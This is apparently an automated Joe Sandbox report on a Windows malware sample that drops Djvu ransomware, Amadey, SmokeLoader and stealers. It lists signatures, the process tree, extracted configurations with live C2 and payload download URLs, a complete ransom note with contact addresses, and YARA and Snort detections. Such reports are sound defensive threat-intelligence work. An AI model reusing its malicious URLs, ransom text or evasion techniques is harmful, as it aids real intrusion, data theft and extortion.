Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample Name:file.exe
Analysis ID:892263
MD5:31fff2eafadae81a6ae1e8580966baba
SHA1:c8f1d3962ba2f8e60ac6aa30cecb553f59374608
SHA256:2147a7d3a63e11d94b02fba0c83799574cdca50c7384f2e72b825e9aecf92916
Tags:exe
Infos:

Detection

Amadey, Babuk, Clipboard Hijacker, Djvu, Fabookie, PrivateLoader, SmokeLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected Amadeys stealer DLL
Detected unpacking (overwrites its own PE header)
Found ransom note / readme
Yara detected Babuk Ransomware
Yara detected SmokeLoader
Yara detected Amadey bot
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Antivirus detection for dropped file
Yara detected Clipboard Hijacker
Snort IDS alert for network traffic
Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Fabookie
Benign windows process drops PE files
Malicious sample detected (through community Yara rule)
Yara detected Djvu Ransomware
Yara detected Vidar stealer
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Yara detected PrivateLoader
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Modifies existing user documents (likely ransomware behavior)
Injects a PE file into a foreign processes
Contains functionality to inject code into remote processes
Deletes itself after installation
Writes a notice file (html or txt) to demand a ransom
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Sample uses string decryption to hide its real strings
Checks if the current machine is a virtual machine (disk enumeration)
Tries to harvest and steal browser information (history, passwords, etc)
Sample uses process hollowing technique
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to dynamically determine API calls
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
PE file contains more sections than normal
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Creates a DirectInput object (often for capturing keystrokes)
PE file contains an invalid checksum
Uses cacls to modify the permissions of files
Connects to several IPs in different countries
Contains functionality to launch a program with higher privileges
Uses Microsoft's Enhanced Cryptographic Provider
Contains functionality to query network adapater information

Classification

  • System is w10x64
  • file.exe (PID: 5672 cmdline: C:\Users\user\Desktop\file.exe MD5: 31FFF2EAFADAE81A6AE1E8580966BABA)
    • explorer.exe (PID: 3528 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
      • 9721.exe (PID: 5512 cmdline: C:\Users\user\AppData\Local\Temp\9721.exe MD5: 122E0DC413CD47850CB2C9547351D03C)
        • 9721.exe (PID: 7060 cmdline: C:\Users\user\AppData\Local\Temp\9721.exe MD5: 122E0DC413CD47850CB2C9547351D03C)
          • icacls.exe (PID: 7028 cmdline: icacls "C:\Users\user\AppData\Local\1276855a-e7ba-481b-bc9d-6b0cdee1a289" /deny *S-1-1-0:(OI)(CI)(DE,DC) MD5: FF0D1D4317A44C951240FAE75075D501)
          • 9721.exe (PID: 5192 cmdline: "C:\Users\user\AppData\Local\Temp\9721.exe" --Admin IsNotAutoStart IsNotTask MD5: 122E0DC413CD47850CB2C9547351D03C)
            • 9721.exe (PID: 5864 cmdline: "C:\Users\user\AppData\Local\Temp\9721.exe" --Admin IsNotAutoStart IsNotTask MD5: 122E0DC413CD47850CB2C9547351D03C)
              • build2.exe (PID: 5964 cmdline: "C:\Users\user\AppData\Local\623f25f4-b030-48f0-b5ce-04f1d0c8fd8b\build2.exe" MD5: B7133C4070082747C60BF6191A5F70DE)
              • build3.exe (PID: 5124 cmdline: "C:\Users\user\AppData\Local\623f25f4-b030-48f0-b5ce-04f1d0c8fd8b\build3.exe" MD5: 9EAD10C08E72AE41921191F8DB39BC16)
      • 124D.exe (PID: 7152 cmdline: C:\Users\user\AppData\Local\Temp\124D.exe MD5: 4572249F67834C8222082D82DA18A797)
        • 124D.exe (PID: 6684 cmdline: C:\Users\user\AppData\Local\Temp\124D.exe MD5: 4572249F67834C8222082D82DA18A797)
      • 46F.exe (PID: 2888 cmdline: C:\Users\user\AppData\Local\Temp\46F.exe MD5: 4572249F67834C8222082D82DA18A797)
        • 46F.exe (PID: 3112 cmdline: C:\Users\user\AppData\Local\Temp\46F.exe MD5: 4572249F67834C8222082D82DA18A797)
          • 46F.exe (PID: 5308 cmdline: "C:\Users\user\AppData\Local\Temp\46F.exe" --Admin IsNotAutoStart IsNotTask MD5: 4572249F67834C8222082D82DA18A797)
            • 46F.exe (PID: 5000 cmdline: "C:\Users\user\AppData\Local\Temp\46F.exe" --Admin IsNotAutoStart IsNotTask MD5: 4572249F67834C8222082D82DA18A797)
      • F42F.exe (PID: 4572 cmdline: C:\Users\user\AppData\Local\Temp\F42F.exe MD5: 4572249F67834C8222082D82DA18A797)
        • F42F.exe (PID: 4768 cmdline: C:\Users\user\AppData\Local\Temp\F42F.exe MD5: 4572249F67834C8222082D82DA18A797)
      • 6E6C.exe (PID: 2148 cmdline: C:\Users\user\AppData\Local\Temp\6E6C.exe MD5: 122E0DC413CD47850CB2C9547351D03C)
        • 6E6C.exe (PID: 4608 cmdline: C:\Users\user\AppData\Local\Temp\6E6C.exe MD5: 122E0DC413CD47850CB2C9547351D03C)
      • 9721.exe (PID: 5384 cmdline: "C:\Users\user\AppData\Local\1276855a-e7ba-481b-bc9d-6b0cdee1a289\9721.exe" --AutoStart MD5: 122E0DC413CD47850CB2C9547351D03C)
        • 9721.exe (PID: 5792 cmdline: "C:\Users\user\AppData\Local\1276855a-e7ba-481b-bc9d-6b0cdee1a289\9721.exe" --AutoStart MD5: 122E0DC413CD47850CB2C9547351D03C)
      • E3B7.exe (PID: 5648 cmdline: C:\Users\user\AppData\Local\Temp\E3B7.exe MD5: 4E40E00BE3370FB1F562B1E09E1275C1)
        • aafg31.exe (PID: 5920 cmdline: "C:\Users\user\AppData\Local\Temp\aafg31.exe" MD5: B64DE8CDC8E3266F695C59918CF0075C)
        • oldplayer.exe (PID: 5160 cmdline: "C:\Users\user\AppData\Local\Temp\oldplayer.exe" MD5: A64A886A695ED5FB9273E73241FEC2F7)
      • 4C9F.exe (PID: 6052 cmdline: C:\Users\user\AppData\Local\Temp\4C9F.exe MD5: A7CC38586C03E1CEEB39E09BC99498A3)
      • 3971.exe (PID: 6004 cmdline: C:\Users\user\AppData\Local\Temp\3971.exe MD5: 4572249F67834C8222082D82DA18A797)
        • 3971.exe (PID: 5972 cmdline: C:\Users\user\AppData\Local\Temp\3971.exe MD5: 4572249F67834C8222082D82DA18A797)
      • 9721.exe (PID: 4560 cmdline: "C:\Users\user\AppData\Local\1276855a-e7ba-481b-bc9d-6b0cdee1a289\9721.exe" --AutoStart MD5: 122E0DC413CD47850CB2C9547351D03C)
        • 9721.exe (PID: 5116 cmdline: "C:\Users\user\AppData\Local\1276855a-e7ba-481b-bc9d-6b0cdee1a289\9721.exe" --AutoStart MD5: 122E0DC413CD47850CB2C9547351D03C)
      • AB42.exe (PID: 5184 cmdline: C:\Users\user\AppData\Local\Temp\AB42.exe MD5: 122E0DC413CD47850CB2C9547351D03C)
  • uwjrhss (PID: 5108 cmdline: C:\Users\user\AppData\Roaming\uwjrhss MD5: 31FFF2EAFADAE81A6AE1E8580966BABA)
  • 9721.exe (PID: 3332 cmdline: C:\Users\user\AppData\Local\1276855a-e7ba-481b-bc9d-6b0cdee1a289\9721.exe --Task MD5: 122E0DC413CD47850CB2C9547351D03C)
    • 9721.exe (PID: 5024 cmdline: C:\Users\user\AppData\Local\1276855a-e7ba-481b-bc9d-6b0cdee1a289\9721.exe --Task MD5: 122E0DC413CD47850CB2C9547351D03C)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
AmadeyAmadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
NameDescriptionAttributionBlogpost URLsLink
BabukBabuk Ransomware is a sophisticated ransomware compiled for several platforms. Windows and ARM for Linux are the most used compiled versions, but ESX and a 32bit old PE executable were observed over time. as well It uses an Elliptic Curve Algorithm (Montgomery Algorithm) to build the encryption keys.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.babuk
NameDescriptionAttributionBlogpost URLsLink
STOP, DjvuSTOP Djvu Ransomware it is a ransomware which encrypts user data through AES-256 and adds one of the dozen available extensions as marker to the encrypted file's name. It is not used to encrypt the entire file but only the first 5 MB. In its original version it was able to run offline and, in that case, it used a hard-coded key which could be extracted to decrypt files.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stop
NameDescriptionAttributionBlogpost URLsLink
FabookieFabookie is facebook account info stealer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.fabookie
NameDescriptionAttributionBlogpost URLsLink
PrivateLoaderAccording to sekoia, PrivateLoader is a modular malware whose main capability is to download and execute one or several payloads. The loader implements anti-analysis techniques, fingerprints the compromised host and reports statistics to its C2 server.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.privateloader
NameDescriptionAttributionBlogpost URLsLink
SmokeLoaderThe SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.
  • SMOKY SPIDER
https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader
{"C2 url": "5.42.65.80/8bmeVwqx/index.php", "Version": "3.83"}
{"Download URLs": ["http://colisumy.com/dl/build2.exe", "http://zexeq.com/files/1/build3.exe"], "C2 url": "http://zexeq.com/raud/get.php", "Ransom note file": "_readme.txt", "Ransom note": "ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-vKvLYNOV9o\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@freshmail.top\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0731JOsie", "Ignore Files": ["ntuser.dat", "ntuser.dat.LOG1", "ntuser.dat.LOG2", "ntuser.pol", ".sys", ".ini", ".DLL", ".dll", ".blf", ".bat", ".lnk", ".regtrans-ms", "C:\\SystemID\\", "C:\\Users\\Default User\\", "C:\\Users\\Public\\", "C:\\Users\\All Users\\", "C:\\Users\\Default\\", "C:\\Documents and Settings\\", "C:\\ProgramData\\", "C:\\Recovery\\", "C:\\System Volume Information\\", "C:\\Users\\%username%\\AppData\\Roaming\\", "C:\\Users\\%username%\\AppData\\Local\\", "C:\\Windows\\", "C:\\PerfLogs\\", "C:\\ProgramData\\Microsoft\\", "C:\\ProgramData\\Package Cache\\", "C:\\Users\\Public\\", "C:\\$Recycle.Bin\\", "C:\\$WINDOWS.~BT\\", "C:\\dell\\", "C:\\Intel\\", "C:\\MSOCache\\", "C:\\Program Files\\", "C:\\Program Files (x86)\\", "C:\\Games\\", "C:\\Windows.old\\", "D:\\Users\\%username%\\AppData\\Roaming\\", "D:\\Users\\%username%\\AppData\\Local\\", "D:\\Windows\\", "D:\\PerfLogs\\", "D:\\ProgramData\\Desktop\\", "D:\\ProgramData\\Microsoft\\", "D:\\ProgramData\\Package Cache\\", "D:\\Users\\Public\\", "D:\\$Recycle.Bin\\", "D:\\$WINDOWS.~BT\\", "D:\\dell\\", "D:\\Intel\\", "D:\\MSOCache\\", "D:\\Program Files\\", "D:\\Program Files (x86)\\", "D:\\Games\\", "E:\\Users\\%username%\\AppData\\Roaming\\", "E:\\Users\\%username%\\AppData\\Local\\", "E:\\Windows\\", "E:\\PerfLogs\\", "E:\\ProgramData\\Desktop\\", "E:\\ProgramData\\Microsoft\\", "E:\\ProgramData\\Package Cache\\", "E:\\Users\\Public\\", "E:\\$Recycle.Bin\\", "E:\\$WINDOWS.~BT\\", "E:\\dell\\", "E:\\Intel\\", "E:\\MSOCache\\", "E:\\Program Files\\", "E:\\Program Files (x86)\\", "E:\\Games\\", "F:\\Users\\%username%\\AppData\\Roaming\\", "F:\\Users\\%username%\\AppData\\Local\\", "F:\\Windows\\", "F:\\PerfLogs\\", "F:\\ProgramData\\Desktop\\", "F:\\ProgramData\\Microsoft\\", "F:\\Users\\Public\\", "F:\\$Recycle.Bin\\", "F:\\$WINDOWS.~BT\\", "F:\\dell\\", "F:\\Intel\\"], "Public Key": "-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAsdHlZ0R9kUzaJ+ON77QV\\\\nmgKExLc0prqBwjshvRgq2ZwBS2V1mj1qzHZERiUSevCe2OSN0SXJ9zRW58+iIsUc\\\\nBre\\/TbNUe3Hmr2go0ggfRN\\/VQV3++uyb0wsvdaAifhKWProwmI5+1ZnbK6SqNQH+\\\\nuvASfEzuOVjjAU9ueJHmeaAvTPdP6EHKW6OmmeDCKF7DCmp73mvrQ3ROr4\\/0zyZ2\\\\nhTDX7QEh23SL9t9PBy98KtriMGECMXml8VnRAn4eYzvR\\/NSjJJEccu6gl3+XpS0W\\\\nxNw4cmbW0\\/WxL8+kVmZu3AQXkaoOohHROkxlapYGWMKypcr8Gp\\/YcHyTP6LVqR3K\\\\n9QIDAQAB\\\\n-----END PUBLIC KEY-----"}
{"Version": 2022, "C2 list": ["http://otriluyttn.org/", "http://tolilolihul.net/", "http://somatoka51hub.net/", "http://nuljjjnuli.org/", "http://potunulit.org/", "http://hutnilior.net/", "http://bulimu55t.net/", "http://soryytlic4.net/", "http://bukubuka1.net/", "http://novanosa5org.org/", "http://hujukui3.net/", "http://newzelannd66.org/", "http://golilopaster.org/"]}
{"C2 url": ["https://steamcommunity.com/profiles/76561199235044780", "https://t.me/headlist"], "Botnet": "153ce668f1e21829c936c2b11fa4d869", "Version": "4.4"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_FabookieYara detected FabookieJoe Security
    dump.pcapJoeSecurity_AmadeyYara detected Amadey botJoe Security
      dump.pcapWindows_Trojan_Clipbanker_f9f9e79dunknownunknown
      • 0xb29944:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
      • 0x1450d47:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
      dump.pcapWindows_Trojan_Clipbanker_787b130bunknownunknown
      • 0xb2963b:$mutex_setup: 55 8B EC 83 EC 18 53 56 57 E8 F8 F4 FF FF 68 30 30 40 00 6A 00 6A 00 FF 15 40 40 40 00 FF 15 2C 40 40 00 3D B7 00 00 00 75 08 6A 00 FF 15 10 30 40 00
      • 0x1450a3e:$mutex_setup: 55 8B EC 83 EC 18 53 56 57 E8 F8 F4 FF FF 68 30 30 40 00 6A 00 6A 00 FF 15 40 40 40 00 FF 15 2C 40 40 00 3D B7 00 00 00 75 08 6A 00 FF 15 10 30 40 00
      • 0xb296c8:$new_line_check: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A
      • 0x1450acb:$new_line_check: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A
      • 0xb296c8:$regex1: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A
      • 0x1450acb:$regex1: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A
      • 0xb299ee:$regex2: 6A 34 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E 66 3B C1 74 19 83 F8 35 74 14 83 F8 36 74 0F 83 F8 37 74 ...
      • 0x1450df1:$regex2: 6A 34 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E 66 3B C1 74 19 83 F8 35 74 14 83 F8 36 74 0F 83 F8 37 74 ...
      • 0xb29b0e:$regex3: 56 8B F1 56 FF 15 20 40 40 00 83 F8 5F 0F 85 84 00 00 00 6A 38 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E ...
      • 0x1450ebf:$regex3: 56 8B F1 56 FF 15 20 40 40 00 83 F8 5F 0F 85 84 00 00 00 6A 38 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E ...
      SourceRuleDescriptionAuthorStrings
      C:\Users\user\AppData\Local\537f7094-d60c-4d6f-ab72-afcba0f739b8\build3.exeJoeSecurity_Clipboard_HijackerYara detected Clipboard HijackerJoe Security
        C:\Users\user\AppData\Local\537f7094-d60c-4d6f-ab72-afcba0f739b8\build3.exeWindows_Trojan_Clipbanker_f9f9e79dunknownunknown
        • 0x1203:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
        C:\Users\user\AppData\Local\537f7094-d60c-4d6f-ab72-afcba0f739b8\build3.exeWindows_Trojan_Clipbanker_787b130bunknownunknown
        • 0xefa:$mutex_setup: 55 8B EC 83 EC 18 53 56 57 E8 F8 F4 FF FF 68 30 30 40 00 6A 00 6A 00 FF 15 40 40 40 00 FF 15 2C 40 40 00 3D B7 00 00 00 75 08 6A 00 FF 15 10 30 40 00
        • 0xf87:$new_line_check: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A
        • 0xf87:$regex1: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A
        • 0x12ad:$regex2: 6A 34 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E 66 3B C1 74 19 83 F8 35 74 14 83 F8 36 74 0F 83 F8 37 74 ...
        • 0x1335:$regex3: 56 8B F1 56 FF 15 20 40 40 00 83 F8 5F 0F 85 84 00 00 00 6A 38 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E ...
        C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exeJoeSecurity_Clipboard_HijackerYara detected Clipboard HijackerJoe Security
          C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exeWindows_Trojan_Clipbanker_f9f9e79dunknownunknown
          • 0x1203:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
          Click to see the 11 entries
          SourceRuleDescriptionAuthorStrings
          00000004.00000002.631890597.0000000001CB0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
          • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
          00000024.00000002.694111730.000000000380C000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
          • 0x798:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
          0000000B.00000002.650483753.0000000001DE5000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
          • 0x798:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
          00000026.00000000.689655808.0000000000AD1000.00000020.00000001.01000000.00000019.sdmpWindows_Trojan_Clipbanker_f9f9e79dunknownunknown
          • 0xe03:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
          00000026.00000000.689655808.0000000000AD1000.00000020.00000001.01000000.00000019.sdmpWindows_Trojan_Clipbanker_787b130bunknownunknown
          • 0xafa:$mutex_setup: 55 8B EC 83 EC 18 53 56 57 E8 F8 F4 FF FF 68 30 30 AD 00 6A 00 6A 00 FF 15 40 40 AD 00 FF 15 2C 40 AD 00 3D B7 00 00 00 75 08 6A 00 FF 15 10 30 AD 00
          • 0xb87:$new_line_check: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A
          • 0xb87:$regex1: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A
          • 0xead:$regex2: 6A 34 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E 66 3B C1 74 19 83 F8 35 74 14 83 F8 36 74 0F 83 F8 37 74 ...
          • 0xf35:$regex3: 56 8B F1 56 FF 15 20 40 AD 00 83 F8 5F 0F 85 84 00 00 00 6A 38 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E ...
          Click to see the 165 entries
          SourceRuleDescriptionAuthorStrings
          37.0.oldplayer.exe.cf0000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
            33.2.build2.exe.1e215a0.1.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
              38.0.build3.exe.ad0000.0.unpackJoeSecurity_Clipboard_HijackerYara detected Clipboard HijackerJoe Security
                38.0.build3.exe.ad0000.0.unpackWindows_Trojan_Clipbanker_f9f9e79dunknownunknown
                • 0x1203:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
                38.0.build3.exe.ad0000.0.unpackWindows_Trojan_Clipbanker_787b130bunknownunknown
                • 0xefa:$mutex_setup: 55 8B EC 83 EC 18 53 56 57 E8 F8 F4 FF FF 68 30 30 AD 00 6A 00 6A 00 FF 15 40 40 AD 00 FF 15 2C 40 AD 00 3D B7 00 00 00 75 08 6A 00 FF 15 10 30 AD 00
                • 0xf87:$new_line_check: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A
                • 0xf87:$regex1: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A
                • 0x12ad:$regex2: 6A 34 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E 66 3B C1 74 19 83 F8 35 74 14 83 F8 36 74 0F 83 F8 37 74 ...
                • 0x1335:$regex3: 56 8B F1 56 FF 15 20 40 AD 00 83 F8 5F 0F 85 84 00 00 00 6A 38 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E ...
                Click to see the 193 entries
                No Sigma rule has matched
                Timestamp:192.168.2.48.8.8.859683532045695 06/21/23-20:23:37.228239
                SID:2045695
                Source Port:59683
                Destination Port:53
                Protocol:UDP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.48.8.8.861007532045695 06/21/23-20:23:42.634507
                SID:2045695
                Source Port:61007
                Destination Port:53
                Protocol:UDP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.48.8.8.859446532045695 06/21/23-20:23:55.526201
                SID:2045695
                Source Port:59446
                Destination Port:53
                Protocol:UDP
                Classtype:A Network Trojan was detected
                Timestamp:181.63.252.68192.168.2.480497062036335 06/21/23-20:23:57.751035
                SID:2036335
                Source Port:80
                Destination Port:49706
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.4190.229.19.749707802036333 06/21/23-20:23:57.425612
                SID:2036333
                Source Port:49707
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.4190.229.19.749707802020826 06/21/23-20:23:57.425612
                SID:2020826
                Source Port:49707
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: http://colisumy.com/dl/build2.exe$runURL Reputation: Label: malware
                Source: http://zexeq.com/files/1/build3.exe$runURL Reputation: Label: malware
                Source: http://zexeq.com/raud/get.phpURL Reputation: Label: malware
                Source: http://zexeq.com/files/1/build3.exerunURL Reputation: Label: malware
                Source: http://colisumy.com/dl/build.exeURL Reputation: Label: malware
                Source: http://colisumy.com/dl/build2.exeURL Reputation: Label: malware
                Source: http://colisumy.com/dl/build2.exeruned57QAvira URL Cloud: Label: malware
                Source: http://zexeq.com/raud/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=trueXAvira URL Cloud: Label: malware
                Source: http://as.imgjeoigaa.com/check/?sid=96310&key=aa6f55198e3f46ac1c8cf076320ddea0Avira URL Cloud: Label: malware
                Source: http://as.imgjeoigaa.com/check/?sid=96284&key=24861507852bad85284d69022e85886cAvira URL Cloud: Label: malware
                Source: http://zexeq.com/raud/get.php0Avira URL Cloud: Label: malware
                Source: http://as.imgjeoigaa.com/check/?sid=96208&key=227c6fc9449cfe3c9f4c724f3db9a31cAvira URL Cloud: Label: malware
                Source: http://zexeq.com/files/1/build3.exeGAvira URL Cloud: Label: malware
                Source: http://zexeq.com/files/1/build3.exeWAvira URL Cloud: Label: malware
                Source: http://colisumy.com/dl/build2.exerun0a2cAvira URL Cloud: Label: malware
                Source: http://zexeq.com/raud/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=trueAvira URL Cloud: Label: malware
                Source: 5.42.65.80/8bmeVwqx/index.phpAvira URL Cloud: Label: malware
                Source: http://as.imgjeoigaa.com/check/?sid=96274&key=9871b54c626752ba88e7b6e5c02b2e5cAvira URL Cloud: Label: malware
                Source: http://as.imgjeoigaa.com/check/?sid=96258&key=02c43f8de48edc98e314a991a9a53167Avira URL Cloud: Label: malware
                Source: http://as.imgjeoigaa.com/check/?sid=96300&key=cd8038b120ac558b521ed1acd844b6e9Avira URL Cloud: Label: malware
                Source: http://zexeq.com/files/1/build3.exe$runyinstall020921_delay721_sec.exe0Avira URL Cloud: Label: malware
                Source: http://zexeq.com/files/1/build3.exe$runoAvira URL Cloud: Label: malware
                Source: http://zexeq.com/Avira URL Cloud: Label: malware
                Source: http://zexeq.com/lancer/get.phpnAvira URL Cloud: Label: malware
                Source: http://zexeq.com/lancer/get.phppAvira URL Cloud: Label: malware
                Source: http://as.imgjeoigaa.com/check/?sid=96214&key=e4f0ccf8f99814617f7408b4efdac436Avira URL Cloud: Label: malware
